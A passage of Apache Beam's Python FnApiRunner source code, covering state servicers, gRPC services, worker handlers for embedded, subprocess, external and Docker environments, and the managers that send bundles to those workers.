-> None self._underlying = underlying self._overlay = overlay self._key = key def __iter__(self): # type: () -> Iterator[bytes] if self._key in self._overlay: return iter(self._overlay[self._key]) else: return iter(self._underlying[self._key]) def append(self, item): # type: (bytes) -> None if self._key not in self._overlay: self._overlay[self._key] = list(self._underlying[self._key]) self._overlay[self._key].append(item) StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]] def __init__(self): # type: () -> None self._lock = threading.Lock() self._state = collections.defaultdict( list) # type: FnApiRunner.StateServicer.StateType self._checkpoint = None # type: Optional[FnApiRunner.StateServicer.StateType] self._use_continuation_tokens = False self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]] def checkpoint(self): # type: () -> None assert self._checkpoint is None and not \ isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState) self._checkpoint = self._state self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state) def commit(self): # type: () -> None assert isinstance(self._state, FnApiRunner.StateServicer.CopyOnWriteState) and \ isinstance(self._checkpoint, FnApiRunner.StateServicer.CopyOnWriteState) self._state.commit() self._state = self._checkpoint.commit() self._checkpoint = None def restore(self): # type: () -> None assert self._checkpoint is not None self._state = self._checkpoint self._checkpoint = None @contextlib.contextmanager def process_instruction_id(self, unused_instruction_id): yield def get_raw(self, state_key, # type: beam_fn_api_pb2.StateKey continuation_token=None # type: Optional[bytes] ): # type: (...) -> Tuple[bytes, Optional[bytes]] with self._lock: full_state = self._state[self._to_key(state_key)] if self._use_continuation_tokens: # The token is "nonce:index". if not continuation_token: token_base = b'token_%x' % len(self._continuations) self._continuations[token_base] = tuple(full_state) return b'', b'%s:0' % token_base else: token_base, index = continuation_token.split(b':') ix = int(index) full_state_cont = self._continuations[token_base] if ix == len(full_state_cont): return b'', None else: return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1) else: assert not continuation_token return b''.join(full_state), None def append_raw( self, state_key, # type: beam_fn_api_pb2.StateKey data # type: bytes ): # type: (...) -> _Future with self._lock: self._state[self._to_key(state_key)].append(data) return _Future.done() def clear(self, state_key): # type: (beam_fn_api_pb2.StateKey) -> _Future with self._lock: try: del self._state[self._to_key(state_key)] except KeyError: # This may happen with the caching layer across bundles. Caching may # skip this storage layer for a blocking_get(key) request. Without # the caching, the state for a key would be initialized via the # defaultdict that _state uses. pass return _Future.done() @staticmethod def _to_key(state_key): # type: (beam_fn_api_pb2.StateKey) -> bytes return state_key.SerializeToString() class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer): def __init__(self, state): # type: (FnApiRunner.StateServicer) -> None self._state = state def State(self, request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest] context=None ): # type: (...) -> Iterator[beam_fn_api_pb2.StateResponse] # Note that this eagerly mutates state, assuming any failures are fatal. # Thus it is safe to ignore instruction_id. 
for request in request_stream: request_type = request.WhichOneof('request') if request_type == 'get': data, continuation_token = self._state.get_raw( request.state_key, request.get.continuation_token) yield beam_fn_api_pb2.StateResponse( id=request.id, get=beam_fn_api_pb2.StateGetResponse( data=data, continuation_token=continuation_token)) elif request_type == 'append': self._state.append_raw(request.state_key, request.append.data) yield beam_fn_api_pb2.StateResponse( id=request.id, append=beam_fn_api_pb2.StateAppendResponse()) elif request_type == 'clear': self._state.clear(request.state_key) yield beam_fn_api_pb2.StateResponse( id=request.id, clear=beam_fn_api_pb2.StateClearResponse()) else: raise NotImplementedError('Unknown state request: %s' % request_type) class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory): """A singleton cache for a StateServicer.""" def __init__(self, state_handler): # type: (sdk_worker.CachingStateHandler) -> None self._state_handler = state_handler def create_state_handler(self, api_service_descriptor): # type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler """Returns the singleton state handler.""" return self._state_handler def close(self): # type: () -> None """Does nothing.""" pass @staticmethod def get_cache_token_generator(static=True): """A generator for cache tokens. :arg static If True, generator always returns the same cache token If False, generator returns a new cache token each time :return A generator which returns a cache token on next(generator) """ def generate_token(identifier): return beam_fn_api_pb2.ProcessBundleRequest.CacheToken( user_state=beam_fn_api_pb2.ProcessBundleRequest.CacheToken.UserState( ), token="cache_token_{}".format(identifier).encode("utf-8")) class StaticGenerator(object): def __init__(self): self._token = generate_token(1) def __iter__(self): # pylint: disable=non-iterator-returned return self def __next__(self): return self._token class DynamicGenerator(object): def __init__(self): self._counter = 0 self._lock = threading.Lock() def __iter__(self): # pylint: disable=non-iterator-returned return self def __next__(self): with self._lock: self._counter += 1 return generate_token(self._counter) return StaticGenerator() if static else DynamicGenerator() class WorkerHandler(object): """worker_handler for a worker. It provides utilities to start / stop the worker, provision any resources for it, as well as provide descriptors for the data, state and logging APIs for it. """ _registered_environments = {} # type: Dict[str, Tuple[ConstructorFn, type]] _worker_id_counter = -1 _lock = threading.Lock() control_conn = None # type: ControlConnection data_conn = None # type: data_plane._GrpcDataChannel def __init__(self, control_handler, data_plane_handler, state, # type: FnApiRunner.StateServicer provision_info # type: Optional[ExtendedProvisionInfo] ): # type: (...) -> None """Initialize a WorkerHandler. 
Args: control_handler: data_plane_handler (data_plane.DataChannel): state: provision_info: """ self.control_handler = control_handler self.data_plane_handler = data_plane_handler self.state = state self.provision_info = provision_info with WorkerHandler._lock: WorkerHandler._worker_id_counter += 1 self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter def close(self): # type: () -> None self.stop_worker() def start_worker(self): # type: () -> None raise NotImplementedError def stop_worker(self): # type: () -> None raise NotImplementedError def data_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError def state_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError def logging_api_service_descriptor(self): # type: () -> Optional[endpoints_pb2.ApiServiceDescriptor] raise NotImplementedError @classmethod def register_environment( cls, urn, # type: str payload_type # type: Optional[Type[T]] ): # type: (...) -> Callable[[Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]], Callable[[T, FnApiRunner.StateServicer, Optional[ExtendedProvisionInfo], GrpcServer], WorkerHandler]] def wrapper(constructor): cls._registered_environments[urn] = constructor, payload_type return constructor return wrapper @classmethod def create(cls, environment, # type: beam_runner_api_pb2.Environment state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> WorkerHandler constructor, payload_type = cls._registered_environments[environment.urn] return constructor( proto_utils.parse_Bytes(environment.payload, payload_type), state, provision_info, grpc_server) @WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None) class EmbeddedWorkerHandler(WorkerHandler): """An in-memory worker_handler for fn API control, state and data planes.""" def __init__(self, unused_payload, # type: None state, # type: sdk_worker.StateHandler provision_info, # type: Optional[ExtendedProvisionInfo] unused_grpc_server # type: GrpcServer ): # type: (...) 
-> None super(EmbeddedWorkerHandler, self).__init__( self, data_plane.InMemoryDataChannel(), state, provision_info) self.control_conn = self # type: ignore # need Protocol to describe this self.data_conn = self.data_plane_handler state_cache = StateCache(STATE_CACHE_SIZE) self.bundle_processor_cache = sdk_worker.BundleProcessorCache( FnApiRunner.SingletonStateHandlerFactory( sdk_worker.CachingStateHandler(state_cache, state)), data_plane.InMemoryDataChannelFactory( self.data_plane_handler.inverse()), {}) self.worker = sdk_worker.SdkWorker( self.bundle_processor_cache, state_cache_metrics_fn=state_cache.get_monitoring_infos) self._uid_counter = 0 def push(self, request): if not request.instruction_id: self._uid_counter += 1 request.instruction_id = 'control_%s' % self._uid_counter response = self.worker.do_instruction(request) return ControlFuture(request.instruction_id, response) def start_worker(self): # type: () -> None pass def stop_worker(self): # type: () -> None self.bundle_processor_cache.shutdown() def done(self): # type: () -> None pass def data_api_service_descriptor(self): # type: () -> None return None def state_api_service_descriptor(self): # type: () -> None return None def logging_api_service_descriptor(self): # type: () -> None return None class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer): LOG_LEVEL_MAP = { beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL, beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR, beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING, beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1, beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO, beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG, beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1, beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET, } def Logging(self, log_messages, context=None): yield beam_fn_api_pb2.LogControl() for log_message in log_messages: for log in log_message.log_entries: logging.log(self.LOG_LEVEL_MAP[log.severity], str(log)) class BasicProvisionService(beam_provision_api_pb2_grpc.ProvisionServiceServicer ): def __init__(self, base_info, worker_manager): # type: (Optional[beam_provision_api_pb2.ProvisionInfo], WorkerHandlerManager) -> None self._base_info = base_info self._worker_manager = worker_manager def GetProvisionInfo(self, request, context=None): # type: (...) -> beam_provision_api_pb2.GetProvisionInfoResponse info = copy.copy(self._base_info) logging.error(('info', info, 'context', context)) if context: worker_id = dict(context.invocation_metadata())['worker_id'] worker = self._worker_manager.get_worker(worker_id) info.logging_endpoint.CopyFrom(worker.logging_api_service_descriptor()) info.artifact_endpoint.CopyFrom(worker.artifact_api_service_descriptor()) info.control_endpoint.CopyFrom(worker.control_api_service_descriptor()) logging.error(('info', info, 'worker_id', worker_id)) return beam_provision_api_pb2.GetProvisionInfoResponse(info=info) class EmptyArtifactRetrievalService( beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer): def GetManifest(self, request, context=None): return beam_artifact_api_pb2.GetManifestResponse( manifest=beam_artifact_api_pb2.Manifest()) def GetArtifact(self, request, context=None): raise ValueError('No artifacts staged.') class GrpcServer(object): _DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5 def __init__(self, state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] worker_manager, # type: WorkerHandlerManager ): # type: (...) 
-> None self.state = state self.provision_info = provision_info self.control_server = grpc.server(UnboundedThreadPoolExecutor()) self.control_port = self.control_server.add_insecure_port('[::]:0') self.control_address = 'localhost:%s' % self.control_port # Options to have no limits (-1) on the size of the messages # received or sent over the data plane. The actual buffer size # is controlled in a layer above. no_max_message_sizes = [("grpc.max_receive_message_length", -1), ("grpc.max_send_message_length", -1)] self.data_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.data_port = self.data_server.add_insecure_port('[::]:0') self.state_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.state_port = self.state_server.add_insecure_port('[::]:0') self.control_handler = BeamFnControlServicer() beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server( self.control_handler, self.control_server) # If we have provision info, serve these off the control port as well. if self.provision_info: if self.provision_info.provision_info: beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server( BasicProvisionService( self.provision_info.provision_info, worker_manager), self.control_server) if self.provision_info.artifact_staging_dir: service = artifact_service.BeamFilesystemArtifactService( self.provision_info.artifact_staging_dir ) # type: beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer else: service = EmptyArtifactRetrievalService() beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server( service, self.control_server) self.data_plane_handler = data_plane.BeamFnDataServicer( DATA_BUFFER_TIME_LIMIT_MS) beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server( self.data_plane_handler, self.data_server) beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server( FnApiRunner.GrpcStateServicer(state), self.state_server) self.logging_server = grpc.server( UnboundedThreadPoolExecutor(), options=no_max_message_sizes) self.logging_port = self.logging_server.add_insecure_port('[::]:0') beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server( BasicLoggingService(), self.logging_server) _LOGGER.info('starting control server on port %s', self.control_port) _LOGGER.info('starting data server on port %s', self.data_port) _LOGGER.info('starting state server on port %s', self.state_port) _LOGGER.info('starting logging server on port %s', self.logging_port) self.logging_server.start() self.state_server.start() self.data_server.start() self.control_server.start() def close(self): self.control_handler.done() to_wait = [ self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS), self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS) ] for w in to_wait: w.wait() class GrpcWorkerHandler(WorkerHandler): """An grpc based worker_handler for fn API control, state and data planes.""" def __init__(self, state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) 
-> None self._grpc_server = grpc_server super(GrpcWorkerHandler, self).__init__( self._grpc_server.control_handler, self._grpc_server.data_plane_handler, state, provision_info) self.state = state self.control_address = self.port_from_worker(self._grpc_server.control_port) self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id( self.worker_id) self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id( self.worker_id) def control_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.control_port)) def artifact_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.control_port)) def data_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.data_port)) def state_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.state_port)) def logging_api_service_descriptor(self): # type: () -> endpoints_pb2.ApiServiceDescriptor return endpoints_pb2.ApiServiceDescriptor( url=self.port_from_worker(self._grpc_server.logging_port)) def close(self): # type: () -> None self.control_conn.close() self.data_conn.close() super(GrpcWorkerHandler, self).close() def port_from_worker(self, port): return '%s:%s' % (self.host_from_worker(), port) def host_from_worker(self): return 'localhost' @WorkerHandler.register_environment( common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload) class ExternalWorkerHandler(GrpcWorkerHandler): def __init__(self, external_payload, # type: beam_runner_api_pb2.ExternalPayload state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(ExternalWorkerHandler, self).__init__(state, provision_info, grpc_server) self._external_payload = external_payload def start_worker(self): # type: () -> None stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub( GRPCChannelFactory.insecure_channel( self._external_payload.endpoint.url)) control_descriptor = endpoints_pb2.ApiServiceDescriptor( url=self.control_address) response = stub.StartWorker( beam_fn_api_pb2.StartWorkerRequest( worker_id=self.worker_id, control_endpoint=control_descriptor, artifact_endpoint=control_descriptor, provision_endpoint=control_descriptor, logging_endpoint=self.logging_api_service_descriptor(), params=self._external_payload.params)) if response.error: raise RuntimeError("Error starting worker: %s" % response.error) def stop_worker(self): # type: () -> None pass def host_from_worker(self): # TODO(BEAM-8646): Reconcile the behavior on Windows platform. if sys.platform == 'win32': return 'localhost' import socket return socket.getfqdn() @WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes) class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler): def __init__(self, payload, # type: bytes state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) 
-> None super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info, grpc_server) from apache_beam.transforms.environments import EmbeddedPythonGrpcEnvironment config = EmbeddedPythonGrpcEnvironment.parse_config(payload.decode('utf-8')) self._state_cache_size = config.get('state_cache_size') or STATE_CACHE_SIZE self._data_buffer_time_limit_ms = \ config.get('data_buffer_time_limit_ms') or DATA_BUFFER_TIME_LIMIT_MS def start_worker(self): # type: () -> None self.worker = sdk_worker.SdkHarness( self.control_address, state_cache_size=self._state_cache_size, data_buffer_time_limit_ms=self._data_buffer_time_limit_ms, worker_id=self.worker_id) self.worker_thread = threading.Thread( name='run_worker', target=self.worker.run) self.worker_thread.daemon = True self.worker_thread.start() def stop_worker(self): # type: () -> None self.worker_thread.join() # The subprocesses module is not threadsafe on Python 2.7. Use this lock to # prevent concurrent calls to POpen(). SUBPROCESS_LOCK = threading.Lock() @WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes) class SubprocessSdkWorkerHandler(GrpcWorkerHandler): def __init__(self, worker_command_line, # type: bytes state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) -> None super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info, grpc_server) self._worker_command_line = worker_command_line def start_worker(self): # type: () -> None from apache_beam.runners.portability import local_job_service self.worker = local_job_service.SubprocessSdkWorker( self._worker_command_line, self.control_address, self.worker_id) self.worker_thread = threading.Thread( name='run_worker', target=self.worker.run) self.worker_thread.start() def stop_worker(self): # type: () -> None self.worker_thread.join() @WorkerHandler.register_environment( common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload) class DockerSdkWorkerHandler(GrpcWorkerHandler): def __init__(self, payload, # type: beam_runner_api_pb2.DockerPayload state, # type: FnApiRunner.StateServicer provision_info, # type: Optional[ExtendedProvisionInfo] grpc_server # type: GrpcServer ): # type: (...) 
-> None super(DockerSdkWorkerHandler, self).__init__(state, provision_info, grpc_server) self._container_image = payload.container_image self._container_id = None # type: Optional[bytes] def host_from_worker(self): if sys.platform == "darwin": # See https://docs.docker.com/docker-for-mac/networking/ return 'host.docker.internal' else: return super(DockerSdkWorkerHandler, self).host_from_worker() def start_worker(self): # type: () -> None with SUBPROCESS_LOCK: try: subprocess.check_call(['docker', 'pull', self._container_image]) except Exception: _LOGGER.info('Unable to pull image %s' % self._container_image) self._container_id = subprocess.check_output([ 'docker', 'run', '-d', # TODO: credentials '--network=host', self._container_image, '--id=%s' % self.worker_id, '--logging_endpoint=%s' % self.logging_api_service_descriptor().url, '--control_endpoint=%s' % self.control_address, '--artifact_endpoint=%s' % self.control_address, '--provision_endpoint=%s' % self.control_address, ]).strip() assert self._container_id is not None while True: status = subprocess.check_output([ 'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id ]).strip() _LOGGER.info( 'Waiting for docker to start up.Current status is %s' % status.decode('utf-8')) if status == b'running': _LOGGER.info( 'Docker container is running. container_id = %s, ' 'worker_id = %s', self._container_id, self.worker_id) break elif status in (b'dead', b'exited'): subprocess.call(['docker', 'container', 'logs', self._container_id]) raise RuntimeError( 'SDK failed to start. Final status is %s' % status.decode('utf-8')) time.sleep(1) def stop_worker(self): # type: () -> None if self._container_id: with SUBPROCESS_LOCK: subprocess.call(['docker', 'kill', self._container_id]) class WorkerHandlerManager(object): """ Manages creation of ``WorkerHandler``s. Caches ``WorkerHandler``s based on environment id. """ def __init__(self, environments, # type: Mapping[str, beam_runner_api_pb2.Environment] job_provision_info # type: Optional[ExtendedProvisionInfo] ): # type: (...) -> None self._environments = environments self._job_provision_info = job_provision_info self._cached_handlers = collections.defaultdict( list) # type: DefaultDict[str, List[WorkerHandler]] self._workers_by_id = {} # type: Dict[str, WorkerHandler] self._state = FnApiRunner.StateServicer() # rename? self._grpc_server = None # type: Optional[GrpcServer] def get_worker_handlers( self, environment_id, # type: Optional[str] num_workers # type: int ): # type: (...) -> List[WorkerHandler] if environment_id is None: # Any environment will do, pick one arbitrarily. environment_id = next(iter(self._environments.keys())) environment = self._environments[environment_id] # assume all environments except EMBEDDED_PYTHON use gRPC. if environment.urn == python_urns.EMBEDDED_PYTHON: # special case for EmbeddedWorkerHandler: there's no need for a gRPC # server, but to pass the type check on WorkerHandler.create() we # make like we have a GrpcServer instance. 
self._grpc_server = cast(GrpcServer, None) elif self._grpc_server is None: self._grpc_server = GrpcServer( self._state, self._job_provision_info, self) worker_handler_list = self._cached_handlers[environment_id] if len(worker_handler_list) < num_workers: for _ in range(len(worker_handler_list), num_workers): worker_handler = WorkerHandler.create( environment, self._state, self._job_provision_info, self._grpc_server) _LOGGER.info( "Created Worker handler %s for environment %s", worker_handler, environment) self._cached_handlers[environment_id].append(worker_handler) self._workers_by_id[worker_handler.worker_id] = worker_handler worker_handler.start_worker() return self._cached_handlers[environment_id][:num_workers] def close_all(self): for worker_handler_list in self._cached_handlers.values(): for worker_handler in set(worker_handler_list): try: worker_handler.close() except Exception: _LOGGER.error( "Error closing worker_handler %s" % worker_handler, exc_info=True) self._cached_handlers = {} self._workers_by_id = {} if self._grpc_server is not None: self._grpc_server.close() self._grpc_server = None def get_worker(self, worker_id): return self._workers_by_id[worker_id] class ExtendedProvisionInfo(object): def __init__(self, provision_info=None, # type: Optional[beam_provision_api_pb2.ProvisionInfo] artifact_staging_dir=None, job_name=None, # type: Optional[str] ): self.provision_info = ( provision_info or beam_provision_api_pb2.ProvisionInfo()) self.artifact_staging_dir = artifact_staging_dir self.job_name = job_name _split_managers = [] @contextlib.contextmanager def split_manager(stage_name, split_manager): """Registers a split manager to control the flow of elements to a given stage. Used for testing. A split manager should be a coroutine yielding desired split fractions, receiving the corresponding split results. Currently, only one input is supported. """ try: _split_managers.append((stage_name, split_manager)) yield finally: _split_managers.pop() class BundleManager(object): """Manages the execution of a bundle from the runner-side. This class receives a bundle descriptor, and performs the following tasks: - Registration of the bundle with the worker. - Splitting of the bundle - Setting up any other bundle requirements (e.g. side inputs). - Submitting the bundle to worker for execution - Passing bundle input data to the worker - Collecting bundle output data from the worker - Finalizing the bundle. """ _uid_counter = 0 _lock = threading.Lock() def __init__(self, worker_handler_list, # type: Sequence[WorkerHandler] get_buffer, # type: Callable[[bytes, str], PartitionableBuffer] get_input_coder_impl, # type: Callable[[str], CoderImpl] bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor progress_frequency=None, skip_registration=False, cache_token_generator=FnApiRunner.get_cache_token_generator() ): """Set up a bundle manager. 
Args: worker_handler_list get_buffer (Callable[[str], list]) get_input_coder_impl (Callable[[str], Coder]) bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor) progress_frequency skip_registration """ self._worker_handler_list = worker_handler_list self._get_buffer = get_buffer self._get_input_coder_impl = get_input_coder_impl self._bundle_descriptor = bundle_descriptor self._registered = skip_registration self._progress_frequency = progress_frequency self._worker_handler = None # type: Optional[WorkerHandler] self._cache_token_generator = cache_token_generator def _send_input_to_worker(self, process_bundle_id, # type: str read_transform_id, # type: str byte_streams ): # type: (...) -> None assert self._worker_handler is not None data_out = self._worker_handler.data_conn.output_stream( process_bundle_id, read_transform_id) for byte_stream in byte_streams: data_out.write(byte_stream) data_out.close() def _register_bundle_descriptor(self): # type: () -> Optional[ControlFuture] if self._registered: registration_future = None else: assert self._worker_handler is not None process_bundle_registration = beam_fn_api_pb2.InstructionRequest( register=beam_fn_api_pb2.RegisterRequest( process_bundle_descriptor=[self._bundle_descriptor])) registration_future = self._worker_handler.control_conn.push( process_bundle_registration) self._registered = True return registration_future def _select_split_manager(self): """TODO(pabloem) WHAT DOES THIS DO""" unique_names = set( t.unique_name for t in self._bundle_descriptor.transforms.values()) for stage_name, candidate in reversed(_split_managers): if (stage_name in unique_names or (stage_name + '/Process') in unique_names): split_manager = candidate break else: split_manager = None return split_manager def _generate_splits_for_testing(self, split_manager, inputs, # type: Mapping[str, PartitionableBuffer] process_bundle_id): # type: (...) -> List[beam_fn_api_pb2.ProcessBundleSplitResponse] split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] read_transform_id, buffer_data = only_element(inputs.items()) byte_stream = b''.join(buffer_data) num_elements = len( list( self._get_input_coder_impl(read_transform_id).decode_all( byte_stream))) # Start the split manager in case it wants to set any breakpoints. split_manager_generator = split_manager(num_elements) try: split_fraction = next(split_manager_generator) done = False except StopIteration: done = True # Send all the data. self._send_input_to_worker( process_bundle_id, read_transform_id, [byte_stream]) assert self._worker_handler is not None # Execute the requested splits. while not done: if split_fraction is None: split_result = None else: split_request = beam_fn_api_pb2.InstructionRequest( process_bundle_split=beam_fn_api_pb2.ProcessBundleSplitRequest( instruction_id=process_bundle_id, desired_splits={ read_transform_id: beam_fn_api_pb2. ProcessBundleSplitRequest.DesiredSplit( fraction_of_remainder=split_fraction, estimated_input_elements=num_elements) })) split_response = self._worker_handler.control_conn.push( split_request).get() # type: beam_fn_api_pb2.InstructionResponse for t in (0.05, 0.1, 0.2): waiting = ('Instruction not running', 'not yet scheduled') if any(msg in split_response.error for msg in waiting): time.sleep(t) split_response = self._worker_handler.control_conn.push( split_request).get() if 'Unknown process bundle' in split_response.error: # It may have finished too fast. 
split_result = None elif split_response.error: raise RuntimeError(split_response.error) else: split_result = split_response.process_bundle_split split_results.append(split_result) try: split_fraction = split_manager_generator.send(split_result) except StopIteration: break return split_results def process_bundle(self, inputs, # type: Mapping[str, PartitionableBuffer] expected_outputs # type: DataOutput ): # type: (...) -> BundleProcessResult # Unique id for the instruction processing this bundle. with BundleManager._lock: BundleManager._uid_counter += 1 process_bundle_id = 'bundle_%s' % BundleManager._uid_counter self._worker_handler = self._worker_handler_list[ BundleManager._uid_counter % len(self._worker_handler_list)] # Register the bundle descriptor, if needed - noop if already registered. registration_future = self._register_bundle_descriptor() # Check that the bundle was successfully registered. if registration_future and registration_future.get().error: raise RuntimeError(registration_future.get().error) split_manager = self._select_split_manager() if not split_manager: # If there is no split_manager, write all input data to the channel. for transform_id, elements in inputs.items(): self._send_input_to_worker(process_bundle_id, transform_id, elements) # Actually start the bundle. process_bundle_req = beam_fn_api_pb2.InstructionRequest( instruction_id=process_bundle_id, process_bundle=beam_fn_api_pb2.ProcessBundleRequest( process_bundle_descriptor_id=self._bundle_descriptor.id, cache_tokens=[next(self._cache_token_generator)])) result_future = self._worker_handler.control_conn.push(process_bundle_req) split_results = [] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] with ProgressRequester(self._worker_handler, process_bundle_id, self._progress_frequency): if split_manager: split_results = self._generate_splits_for_testing( split_manager, inputs, process_bundle_id) # Gather all output data. for output in self._worker_handler.data_conn.input_elements( process_bundle_id, expected_outputs.keys(), abort_callback=lambda: (result_future.is_done() and result_future.get().error)): if output.transform_id in expected_outputs: with BundleManager._lock: self._get_buffer( expected_outputs[output.transform_id], output.transform_id).append(output.data) _LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id) result = result_future.get() # type: beam_fn_api_pb2.InstructionResponse if result.error: raise RuntimeError(result.error) if result.process_bundle.requires_finalization: finalize_request = beam_fn_api_pb2.InstructionRequest( finalize_bundle=beam_fn_api_pb2.FinalizeBundleRequest( instruction_id=process_bundle_id)) self._worker_handler.control_conn.push(finalize_request) return result, split_results class ParallelBundleManager(BundleManager): def __init__( self, worker_handler_list, # type: Sequence[WorkerHandler] get_buffer, # type: Callable[[bytes, str], PartitionableBuffer] get_input_coder_impl, # type: Callable[[str], CoderImpl] bundle_descriptor, # type: beam_fn_api_pb2.ProcessBundleDescriptor progress_frequency=None, skip_registration=False, cache_token_generator=None, **kwargs): # type: (...) 
-> None super(ParallelBundleManager, self).__init__( worker_handler_list, get_buffer, get_input_coder_impl, bundle_descriptor, progress_frequency, skip_registration, cache_token_generator=cache_token_generator) self._num_workers = kwargs.pop('num_workers', 1) def process_bundle(self, inputs, # type: Mapping[str, PartitionableBuffer] expected_outputs # type: DataOutput ): # type: (...) -> BundleProcessResult part_inputs = [{} for _ in range(self._num_workers) ] # type: List[Dict[str, List[bytes]]] for name, input in inputs.items(): for ix, part in enumerate(input.partition(self._num_workers)): part_inputs[ix][name] = part merged_result = None # type: Optional[beam_fn_api_pb2.InstructionResponse] split_result_list = [ ] # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse] def execute(part_map): # type: (...) -> BundleProcessResult bundle_manager = BundleManager( self._worker_handler_list, self._get_buffer, self._get_input_coder_impl, self._bundle_descriptor, self._progress_frequency, self._registered, cache_token_generator=self._cache_token_generator) return bundle_manager.process_bundle(part_map, expected_outputs) with UnboundedThreadPoolExecutor() as executor: for result, split_result in executor.map(execute, part_inputs): split_result_list += split_result if merged_result is None: merged_result = result else: merged_result = beam_fn_api_pb2.InstructionResponse( process_bundle=beam_fn_api_pb2.ProcessBundleResponse( monitoring_infos=monitoring_infos.consolidate( itertools.chain( result.process_bundle.monitoring_infos, merged_result.process_bundle.monitoring_infos))), error=result.error or merged_result.error) assert merged_result is not None return merged_result, split_result_list class ProgressRequester(threading.Thread): """ Thread that asks SDK Worker for progress reports with a certain frequency. A callback can be passed to call with progress updates. """ def __init__(self, worker_handler, # type: WorkerHandler instruction_id, frequency, callback=None ): # type: (...) -> None super(ProgressRequester, self).__init__() self._worker_handler = worker_handler self._instruction_id = instruction_id self._frequency = frequency self._done = False self._latest_progress = None self._callback = callback self.daemon = True def __enter__(self): if self._frequency: self.start() def __exit__(self, *unused_exc_info): if self._frequency: self.stop() def run(self): while not self._done: try: progress_result = self._worker_handler.control_conn.push( beam_fn_api_pb2.InstructionRequest( process_bundle_progress=beam_fn_api_pb2. 
